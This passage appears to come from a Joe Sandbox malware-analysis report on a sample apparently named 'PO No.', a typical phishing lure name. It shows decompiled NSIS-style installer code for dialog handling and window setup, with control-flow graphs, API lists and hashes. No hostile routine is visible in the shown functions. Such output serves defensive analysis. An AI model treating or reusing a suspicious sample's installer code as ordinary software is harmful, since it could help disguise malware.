337->339 340 4041a0-4041df call 40437a call 403e4d call 4063b0 lstrlenW call 4063d2 SetWindowTextW call 401389 338->340 339->340 340->280 351 4041e5-4041e7 340->351 351->280 352 4041ed-4041f1 351->352 353 404210-404224 DestroyWindow 352->353 354 4041f3-4041f9 352->354 353->288 356 40422a-404257 CreateDialogParamW 353->356 354->279 355 4041ff-404205 354->355 355->280 357 40420b 355->357 356->288 358 40425d-4042b4 call 404345 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->279 358->279 363 4042b6-4042ce ShowWindow call 404391 358->363 363->288
                                                                      C-Code - Quality: 83%
                                                                      			E00403E6C(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                      				struct HWND__* _v32;
                                                                      				void* _v84;
                                                                      				void* _v88;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t37;
                                                                      				signed int _t39;
                                                                      				signed int _t41;
                                                                      				struct HWND__* _t51;
                                                                      				signed int _t70;
                                                                      				struct HWND__* _t76;
                                                                      				signed int _t89;
                                                                      				struct HWND__* _t94;
                                                                      				signed int _t102;
                                                                      				int _t106;
                                                                      				signed int _t118;
                                                                      				signed int _t119;
                                                                      				int _t120;
                                                                      				signed int _t125;
                                                                      				struct HWND__* _t128;
                                                                      				struct HWND__* _t129;
                                                                      				int _t130;
                                                                      				long _t133;
                                                                      				int _t135;
                                                                      				int _t136;
                                                                      				void* _t137;
                                                                      
                                                                      				_t118 = _a8;
                                                                      				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                      					_t37 = _a12;
                                                                      					_t128 = _a4;
                                                                      					__eflags = _t118 - 0x110;
                                                                      					 *0x423710 = _t37;
                                                                      					if(_t118 == 0x110) {
                                                                      						 *0x42a248 = _t128;
                                                                      						 *0x423724 = GetDlgItem(_t128, 1);
                                                                      						_t94 = GetDlgItem(_t128, 2);
                                                                      						_push(0xffffffff);
                                                                      						_push(0x1c);
                                                                      						 *0x4216f0 = _t94;
                                                                      						E00404345(_t128);
                                                                      						SetClassLongW(_t128, 0xfffffff2,  *0x429228);
                                                                      						 *0x42920c = E0040140B(4);
                                                                      						_t37 = 1;
                                                                      						__eflags = 1;
                                                                      						 *0x423710 = 1;
                                                                      					}
                                                                      					_t125 =  *0x40a39c; // 0x0
                                                                      					_t136 = 0;
                                                                      					_t133 = (_t125 << 6) +  *0x42a280;
                                                                      					__eflags = _t125;
                                                                      					if(_t125 < 0) {
                                                                      						L34:
                                                                      						E00404391(0x40b);
                                                                      						while(1) {
                                                                      							_t39 =  *0x423710;
                                                                      							 *0x40a39c =  *0x40a39c + _t39;
                                                                      							_t133 = _t133 + (_t39 << 6);
                                                                      							_t41 =  *0x40a39c; // 0x0
                                                                      							__eflags = _t41 -  *0x42a284;
                                                                      							if(_t41 ==  *0x42a284) {
                                                                      								E0040140B(1);
                                                                      							}
                                                                      							__eflags =  *0x42920c - _t136;
                                                                      							if( *0x42920c != _t136) {
                                                                      								break;
                                                                      							}
                                                                      							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                      							if(__eflags >= 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t119 =  *(_t133 + 0x14);
                                                                      							E004063D2(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                      							_push(0xfffffc19);
                                                                      							E00404345(_t128);
                                                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                      							_push(0xfffffc1b);
                                                                      							E00404345(_t128);
                                                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                      							_push(0xfffffc1a);
                                                                      							E00404345(_t128);
                                                                      							_t51 = GetDlgItem(_t128, 3);
                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                      							_v32 = _t51;
                                                                      							if( *0x42a2ec != _t136) {
                                                                      								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                      								__eflags = _t119;
                                                                      							}
                                                                      							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                      							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                      							E00404367(_t119 & 0x00000002);
                                                                      							_t120 = _t119 & 0x00000004;
                                                                      							EnableWindow( *0x4216f0, _t120);
                                                                      							__eflags = _t120 - _t136;
                                                                      							if(_t120 == _t136) {
                                                                      								_push(1);
                                                                      							} else {
                                                                      								_push(_t136);
                                                                      							}
                                                                      							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                      							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                      							if( *0x42a2ec == _t136) {
                                                                      								_push( *0x423724);
                                                                      							} else {
                                                                      								SendMessageW(_t128, 0x401, 2, _t136);
                                                                      								_push( *0x4216f0);
                                                                      							}
                                                                      							E0040437A();
                                                                      							E004063B0(0x423728, E00403E4D());
                                                                      							E004063D2(0x423728, _t128, _t133,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                      							SetWindowTextW(_t128, 0x423728); // executed
                                                                      							_push(_t136);
                                                                      							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                      							__eflags = _t70;
                                                                      							if(_t70 != 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								__eflags =  *_t133 - _t136;
                                                                      								if( *_t133 == _t136) {
                                                                      									continue;
                                                                      								}
                                                                      								__eflags =  *(_t133 + 4) - 5;
                                                                      								if( *(_t133 + 4) != 5) {
                                                                      									DestroyWindow( *0x429218); // executed
                                                                      									 *0x422700 = _t133;
                                                                      									__eflags =  *_t133 - _t136;
                                                                      									if( *_t133 <= _t136) {
                                                                      										goto L58;
                                                                      									}
                                                                      									_t76 = CreateDialogParamW( *0x42a240,  *_t133 +  *0x429220 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                                      									__eflags = _t76 - _t136;
                                                                      									 *0x429218 = _t76;
                                                                      									if(_t76 == _t136) {
                                                                      										goto L58;
                                                                      									}
                                                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                      									_push(6);
                                                                      									E00404345(_t76);
                                                                      									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                      									ScreenToClient(_t128, _t137 + 0x10);
                                                                      									SetWindowPos( *0x429218, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                      									_push(_t136);
                                                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                      									__eflags =  *0x42920c - _t136;
                                                                      									if( *0x42920c != _t136) {
                                                                      										goto L61;
                                                                      									}
                                                                      									ShowWindow( *0x429218, 8);
                                                                      									E00404391(0x405);
                                                                      									goto L58;
                                                                      								}
                                                                      								__eflags =  *0x42a2ec - _t136;
                                                                      								if( *0x42a2ec != _t136) {
                                                                      									goto L61;
                                                                      								}
                                                                      								__eflags =  *0x42a2e0 - _t136;
                                                                      								if( *0x42a2e0 != _t136) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L61;
                                                                      							}
                                                                      						}
                                                                      						DestroyWindow( *0x429218);
                                                                      						 *0x42a248 = _t136;
                                                                      						EndDialog(_t128,  *0x421ef8);
                                                                      						goto L58;
                                                                      					} else {
                                                                      						__eflags = _t37 - 1;
                                                                      						if(_t37 != 1) {
                                                                      							L33:
                                                                      							__eflags =  *_t133 - _t136;
                                                                      							if( *_t133 == _t136) {
                                                                      								goto L61;
                                                                      							}
                                                                      							goto L34;
                                                                      						}
                                                                      						_push(0);
                                                                      						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                      						__eflags = _t89;
                                                                      						if(_t89 == 0) {
                                                                      							goto L33;
                                                                      						}
                                                                      						SendMessageW( *0x429218, 0x40f, 0, 1);
                                                                      						__eflags =  *0x42920c;
                                                                      						return 0 |  *0x42920c == 0x00000000;
                                                                      					}
                                                                      				} else {
                                                                      					_t128 = _a4;
                                                                      					_t136 = 0;
                                                                      					if(_t118 == 0x47) {
                                                                      						SetWindowPos( *0x423708, _t128, 0, 0, 0, 0, 0x13);
                                                                      					}
                                                                      					if(_t118 == 5) {
                                                                      						asm("sbb eax, eax");
                                                                      						ShowWindow( *0x423708,  ~(_a12 - 1) & _t118);
                                                                      					}
                                                                      					if(_t118 != 0x40d) {
                                                                      						__eflags = _t118 - 0x11;
                                                                      						if(_t118 != 0x11) {
                                                                      							__eflags = _t118 - 0x111;
                                                                      							if(_t118 != 0x111) {
                                                                      								L26:
                                                                      								return E004043AC(_t118, _a12, _a16);
                                                                      							}
                                                                      							_t135 = _a12 & 0x0000ffff;
                                                                      							_t129 = GetDlgItem(_t128, _t135);
                                                                      							__eflags = _t129 - _t136;
                                                                      							if(_t129 == _t136) {
                                                                      								L13:
                                                                      								__eflags = _t135 - 1;
                                                                      								if(_t135 != 1) {
                                                                      									__eflags = _t135 - 3;
                                                                      									if(_t135 != 3) {
                                                                      										_t130 = 2;
                                                                      										__eflags = _t135 - _t130;
                                                                      										if(_t135 != _t130) {
                                                                      											L25:
                                                                      											SendMessageW( *0x429218, 0x111, _a12, _a16);
                                                                      											goto L26;
                                                                      										}
                                                                      										__eflags =  *0x42a2ec - _t136;
                                                                      										if( *0x42a2ec == _t136) {
                                                                      											_t102 = E0040140B(3);
                                                                      											__eflags = _t102;
                                                                      											if(_t102 != 0) {
                                                                      												goto L26;
                                                                      											}
                                                                      											 *0x421ef8 = 1;
                                                                      											L21:
                                                                      											_push(0x78);
                                                                      											L22:
                                                                      											E0040431E();
                                                                      											goto L26;
                                                                      										}
                                                                      										E0040140B(_t130);
                                                                      										 *0x421ef8 = _t130;
                                                                      										goto L21;
                                                                      									}
                                                                      									__eflags =  *0x40a39c - _t136; // 0x0
                                                                      									if(__eflags <= 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									_push(0xffffffff);
                                                                      									goto L22;
                                                                      								}
                                                                      								_push(_t135);
                                                                      								goto L22;
                                                                      							}
                                                                      							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                      							_t106 = IsWindowEnabled(_t129);
                                                                      							__eflags = _t106;
                                                                      							if(_t106 == 0) {
                                                                      								goto L61;
                                                                      							}
                                                                      							goto L13;
                                                                      						}
                                                                      						SetWindowLongW(_t128, _t136, _t136);
                                                                      						return 1;
                                                                      					} else {
                                                                      						DestroyWindow( *0x429218);
                                                                      						 *0x429218 = _a12;
                                                                      						L58:
                                                                      						if( *0x425728 == _t136 &&  *0x429218 != _t136) {
                                                                      							ShowWindow(_t128, 0xa);
                                                                      							 *0x425728 = 1;
                                                                      						}
                                                                      						L61:
                                                                      						return 0;
                                                                      					}
                                                                      				}
                                                                      			}






























                                                                      0x00403e75
                                                                      0x00403e7e
                                                                      0x00403fbf
                                                                      0x00403fc3
                                                                      0x00403fc7
                                                                      0x00403fc9
                                                                      0x00403fce
                                                                      0x00403fd9
                                                                      0x00403fe4
                                                                      0x00403fe9
                                                                      0x00403feb
                                                                      0x00403fed
                                                                      0x00403ff0
                                                                      0x00403ff5
                                                                      0x00404003
                                                                      0x00404010
                                                                      0x00404017
                                                                      0x00404017
                                                                      0x00404018
                                                                      0x00404018
                                                                      0x0040401d
                                                                      0x00404023
                                                                      0x0040402a
                                                                      0x00404030
                                                                      0x00404032
                                                                      0x00404072
                                                                      0x00404077
                                                                      0x0040407c
                                                                      0x0040407c
                                                                      0x00404081
                                                                      0x0040408a
                                                                      0x0040408c
                                                                      0x00404091
                                                                      0x00404097
                                                                      0x0040409b
                                                                      0x0040409b
                                                                      0x004040a0
                                                                      0x004040a6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004040b1
                                                                      0x004040b7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004040c0
                                                                      0x004040c8
                                                                      0x004040cd
                                                                      0x004040d0
                                                                      0x004040d6
                                                                      0x004040db
                                                                      0x004040de
                                                                      0x004040e4
                                                                      0x004040e9
                                                                      0x004040ec
                                                                      0x004040f2
                                                                      0x004040fa
                                                                      0x00404100
                                                                      0x00404106
                                                                      0x0040410a
                                                                      0x00404111
                                                                      0x00404111
                                                                      0x00404111
                                                                      0x0040411b
                                                                      0x0040412d
                                                                      0x00404139
                                                                      0x0040413e
                                                                      0x00404148
                                                                      0x0040414e
                                                                      0x00404150
                                                                      0x00404155
                                                                      0x00404152
                                                                      0x00404152
                                                                      0x00404152
                                                                      0x00404165
                                                                      0x0040417d
                                                                      0x0040417f
                                                                      0x00404185
                                                                      0x0040419a
                                                                      0x00404187
                                                                      0x00404190
                                                                      0x00404192
                                                                      0x00404192
                                                                      0x004041a0
                                                                      0x004041b1
                                                                      0x004041c7
                                                                      0x004041ce
                                                                      0x004041d4
                                                                      0x004041d8
                                                                      0x004041dd
                                                                      0x004041df
                                                                      0x00000000
                                                                      0x004041e5
                                                                      0x004041e5
                                                                      0x004041e7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004041ed
                                                                      0x004041f1
                                                                      0x00404216
                                                                      0x0040421c
                                                                      0x00404222
                                                                      0x00404224
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040424a
                                                                      0x00404250
                                                                      0x00404252
                                                                      0x00404257
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040425d
                                                                      0x00404260
                                                                      0x00404263
                                                                      0x0040427a
                                                                      0x00404286
                                                                      0x0040429f
                                                                      0x004042a5
                                                                      0x004042a9
                                                                      0x004042ae
                                                                      0x004042b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004042be
                                                                      0x004042c9
                                                                      0x00000000
                                                                      0x004042c9
                                                                      0x004041f3
                                                                      0x004041f9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004041ff
                                                                      0x00404205
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040420b
                                                                      0x004041df
                                                                      0x004042d6
                                                                      0x004042e2
                                                                      0x004042e9
                                                                      0x00000000
                                                                      0x00404034
                                                                      0x00404034
                                                                      0x00404037
                                                                      0x0040406a
                                                                      0x0040406a
                                                                      0x0040406c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040406c
                                                                      0x00404039
                                                                      0x0040403d
                                                                      0x00404042
                                                                      0x00404044
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404054
                                                                      0x0040405c
                                                                      0x00000000
                                                                      0x00404062
                                                                      0x00403e90
                                                                      0x00403e90
                                                                      0x00403e94
                                                                      0x00403e99
                                                                      0x00403ea8
                                                                      0x00403ea8
                                                                      0x00403eb1
                                                                      0x00403eba
                                                                      0x00403ec5
                                                                      0x00403ec5
                                                                      0x00403ed1
                                                                      0x00403eed
                                                                      0x00403ef0
                                                                      0x00403f03
                                                                      0x00403f09
                                                                      0x00403fac
                                                                      0x00000000
                                                                      0x00403fb5
                                                                      0x00403f0f
                                                                      0x00403f1c
                                                                      0x00403f1e
                                                                      0x00403f20
                                                                      0x00403f3f
                                                                      0x00403f3f
                                                                      0x00403f42
                                                                      0x00403f47
                                                                      0x00403f4a
                                                                      0x00403f5a
                                                                      0x00403f5b
                                                                      0x00403f5d
                                                                      0x00403f93
                                                                      0x00403fa6
                                                                      0x00000000
                                                                      0x00403fa6
                                                                      0x00403f5f
                                                                      0x00403f65
                                                                      0x00403f7e
                                                                      0x00403f83
                                                                      0x00403f85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403f87
                                                                      0x00403f73
                                                                      0x00403f73
                                                                      0x00403f75
                                                                      0x00403f75
                                                                      0x00000000
                                                                      0x00403f75
                                                                      0x00403f68
                                                                      0x00403f6d
                                                                      0x00000000
                                                                      0x00403f6d
                                                                      0x00403f4c
                                                                      0x00403f52
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403f54
                                                                      0x00000000
                                                                      0x00403f54
                                                                      0x00403f44
                                                                      0x00000000
                                                                      0x00403f44
                                                                      0x00403f2a
                                                                      0x00403f31
                                                                      0x00403f37
                                                                      0x00403f39
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403f39
                                                                      0x00403ef5
                                                                      0x00000000
                                                                      0x00403ed3
                                                                      0x00403ed9
                                                                      0x00403ee3
                                                                      0x004042ef
                                                                      0x004042f5
                                                                      0x00404302
                                                                      0x00404308
                                                                      0x00404308
                                                                      0x00404312
                                                                      0x00000000
                                                                      0x00404312
                                                                      0x00403ed1

                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                                      • ShowWindow.USER32(?), ref: 00403EC5
                                                                      • DestroyWindow.USER32 ref: 00403ED9
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                                      • GetDlgItem.USER32(?,?), ref: 00403F16
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403FDF
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
                                                                      • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                                      • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412D
                                                                      • EnableWindow.USER32(?,?), ref: 00404148
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
                                                                      • EnableMenuItem.USER32(00000000), ref: 00404165
                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID: (7B
                                                                      • API String ID: 3282139019-3251261122
                                                                      • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                      • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                                      • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                      • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 366 403abe-403ad6 call 40678a 369 403ad8-403ae3 GetUserDefaultUILanguage call 4062f7 366->369 370 403aea-403b21 call 40627e 366->370 373 403ae8 369->373 376 403b23-403b34 call 40627e 370->376 377 403b39-403b3f lstrcatW 370->377 375 403b44-403b6d call 403d94 call 405d89 373->375 383 403b73-403b78 375->383 384 403bff-403c07 call 405d89 375->384 376->377 377->375 383->384 385 403b7e-403ba6 call 40627e 383->385 390 403c15-403c3a LoadImageW 384->390 391 403c09-403c10 call 4063d2 384->391 385->384 392 403ba8-403bac 385->392 394 403cbb-403cc3 call 40140b 390->394 395 403c3c-403c6c RegisterClassW 390->395 391->390 397 403bbe-403bca lstrlenW 392->397 398 403bae-403bbb call 405cae 392->398 406 403cc5-403cc8 394->406 407 403ccd-403cd8 call 403d94 394->407 399 403c72-403cb6 SystemParametersInfoW CreateWindowExW 395->399 400 403d8a 395->400 404 403bf2-403bfa call 405c81 call 4063b0 397->404 405 403bcc-403bda lstrcmpiW 397->405 398->397 399->394 403 403d8c-403d93 400->403 404->384 405->404 410 403bdc-403be6 GetFileAttributesW 405->410 406->403 418 403d61-403d69 call 4054e7 407->418 419 403cde-403cf8 ShowWindow call 40671a 407->419 411 403be8-403bea 410->411 412 403bec-403bed call 405ccd 410->412 411->404 411->412 412->404 424 403d83-403d85 call 40140b 418->424 425 403d6b-403d71 418->425 426 403d04-403d16 GetClassInfoW 419->426 427 403cfa-403cff call 40671a 419->427 424->400 425->406 428 403d77-403d7e call 40140b 425->428 431 403d18-403d28 GetClassInfoW RegisterClassW 426->431 432 403d2e-403d51 DialogBoxParamW call 40140b 426->432 427->426 428->406 431->432 436 403d56-403d5f call 403a0e 432->436 436->403
                                                                      C-Code - Quality: 96%
                                                                      			E00403ABE(void* __eflags) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				int _v12;
                                                                      				void _v16;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t22;
                                                                      				void* _t30;
                                                                      				void* _t32;
                                                                      				int _t33;
                                                                      				void* _t36;
                                                                      				int _t39;
                                                                      				int _t40;
                                                                      				int _t44;
                                                                      				short _t63;
                                                                      				WCHAR* _t65;
                                                                      				signed char _t69;
                                                                      				signed short _t73;
                                                                      				WCHAR* _t76;
                                                                      				intOrPtr _t82;
                                                                      				WCHAR* _t87;
                                                                      
                                                                      				_t82 =  *0x42a254;
                                                                      				_t22 = E0040678A(2);
                                                                      				_t90 = _t22;
                                                                      				if(_t22 == 0) {
                                                                      					_t76 = 0x423728;
                                                                      					L"1033" = 0x30;
                                                                      					 *0x437002 = 0x78;
                                                                      					 *0x437004 = 0;
                                                                      					E0040627E(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
                                                                      					__eflags =  *0x423728;
                                                                      					if(__eflags == 0) {
                                                                      						E0040627E(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x423728, 0);
                                                                      					}
                                                                      					lstrcatW(L"1033", _t76);
                                                                      				} else {
                                                                      					_t73 =  *_t22(); // executed
                                                                      					E004062F7(L"1033", _t73 & 0x0000ffff);
                                                                      				}
                                                                      				E00403D94(_t78, _t90);
                                                                      				_t86 = L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose";
                                                                      				 *0x42a2e0 =  *0x42a25c & 0x00000020;
                                                                      				 *0x42a2fc = 0x10000;
                                                                      				if(E00405D89(_t90, L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose") != 0) {
                                                                      					L16:
                                                                      					if(E00405D89(_t98, _t86) == 0) {
                                                                      						E004063D2(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                      					}
                                                                      					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040); // executed
                                                                      					 *0x429228 = _t30;
                                                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                      						L21:
                                                                      						if(E0040140B(0) == 0) {
                                                                      							_t32 = E00403D94(_t78, __eflags);
                                                                      							__eflags =  *0x42a300;
                                                                      							if( *0x42a300 != 0) {
                                                                      								_t33 = E004054E7(_t32, 0);
                                                                      								__eflags = _t33;
                                                                      								if(_t33 == 0) {
                                                                      									E0040140B(1);
                                                                      									goto L33;
                                                                      								}
                                                                      								__eflags =  *0x42920c;
                                                                      								if( *0x42920c == 0) {
                                                                      									E0040140B(2);
                                                                      								}
                                                                      								goto L22;
                                                                      							}
                                                                      							ShowWindow( *0x423708, 5); // executed
                                                                      							_t39 = E0040671A("RichEd20"); // executed
                                                                      							__eflags = _t39;
                                                                      							if(_t39 == 0) {
                                                                      								E0040671A("RichEd32");
                                                                      							}
                                                                      							_t87 = L"RichEdit20W";
                                                                      							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
                                                                      							__eflags = _t40;
                                                                      							if(_t40 == 0) {
                                                                      								GetClassInfoW(0, L"RichEdit", 0x4291e0);
                                                                      								 *0x429204 = _t87;
                                                                      								RegisterClassW(0x4291e0);
                                                                      							}
                                                                      							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403E6C, 0); // executed
                                                                      							E00403A0E(E0040140B(5), 1);
                                                                      							return _t44;
                                                                      						}
                                                                      						L22:
                                                                      						_t36 = 2;
                                                                      						return _t36;
                                                                      					} else {
                                                                      						_t78 =  *0x42a240;
                                                                      						 *0x4291e4 = E00401000;
                                                                      						 *0x4291f0 =  *0x42a240;
                                                                      						 *0x4291f4 = _t30;
                                                                      						 *0x429204 = 0x40a3b4;
                                                                      						if(RegisterClassW(0x4291e0) == 0) {
                                                                      							L33:
                                                                      							__eflags = 0;
                                                                      							return 0;
                                                                      						}
                                                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                      						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
                                                                      						goto L21;
                                                                      					}
                                                                      				} else {
                                                                      					_t78 =  *(_t82 + 0x48);
                                                                      					_t92 = _t78;
                                                                      					if(_t78 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					_t76 = 0x4281e0;
                                                                      					E0040627E(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
                                                                      					_t63 =  *0x4281e0; // 0x43
                                                                      					if(_t63 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					if(_t63 == 0x22) {
                                                                      						_t76 = 0x4281e2;
                                                                      						 *((short*)(E00405CAE(0x4281e2, 0x22))) = 0;
                                                                      					}
                                                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                      						L15:
                                                                      						E004063B0(_t86, E00405C81(_t76));
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t69 = GetFileAttributesW(_t76);
                                                                      						if(_t69 == 0xffffffff) {
                                                                      							L14:
                                                                      							E00405CCD(_t76);
                                                                      							goto L15;
                                                                      						}
                                                                      						_t98 = _t69 & 0x00000010;
                                                                      						if((_t69 & 0x00000010) != 0) {
                                                                      							goto L15;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      			}

























                                                                      0x00403ac4
                                                                      0x00403acd
                                                                      0x00403ad4
                                                                      0x00403ad6
                                                                      0x00403aea
                                                                      0x00403afc
                                                                      0x00403b05
                                                                      0x00403b0e
                                                                      0x00403b15
                                                                      0x00403b1a
                                                                      0x00403b21
                                                                      0x00403b34
                                                                      0x00403b34
                                                                      0x00403b3f
                                                                      0x00403ad8
                                                                      0x00403ad8
                                                                      0x00403ae3
                                                                      0x00403ae3
                                                                      0x00403b44
                                                                      0x00403b4e
                                                                      0x00403b57
                                                                      0x00403b5c
                                                                      0x00403b6d
                                                                      0x00403bff
                                                                      0x00403c07
                                                                      0x00403c10
                                                                      0x00403c10
                                                                      0x00403c26
                                                                      0x00403c2c
                                                                      0x00403c3a
                                                                      0x00403cbb
                                                                      0x00403cc3
                                                                      0x00403ccd
                                                                      0x00403cd2
                                                                      0x00403cd8
                                                                      0x00403d62
                                                                      0x00403d67
                                                                      0x00403d69
                                                                      0x00403d85
                                                                      0x00000000
                                                                      0x00403d85
                                                                      0x00403d6b
                                                                      0x00403d71
                                                                      0x00403d79
                                                                      0x00403d79
                                                                      0x00000000
                                                                      0x00403d71
                                                                      0x00403ce6
                                                                      0x00403cf1
                                                                      0x00403cf6
                                                                      0x00403cf8
                                                                      0x00403cff
                                                                      0x00403cff
                                                                      0x00403d0a
                                                                      0x00403d12
                                                                      0x00403d14
                                                                      0x00403d16
                                                                      0x00403d1f
                                                                      0x00403d22
                                                                      0x00403d28
                                                                      0x00403d28
                                                                      0x00403d47
                                                                      0x00403d58
                                                                      0x00000000
                                                                      0x00403d5d
                                                                      0x00403cc5
                                                                      0x00403cc7
                                                                      0x00000000
                                                                      0x00403c3c
                                                                      0x00403c3c
                                                                      0x00403c48
                                                                      0x00403c52
                                                                      0x00403c58
                                                                      0x00403c5d
                                                                      0x00403c6c
                                                                      0x00403d8a
                                                                      0x00403d8a
                                                                      0x00000000
                                                                      0x00403d8a
                                                                      0x00403c7b
                                                                      0x00403cb6
                                                                      0x00000000
                                                                      0x00403cb6
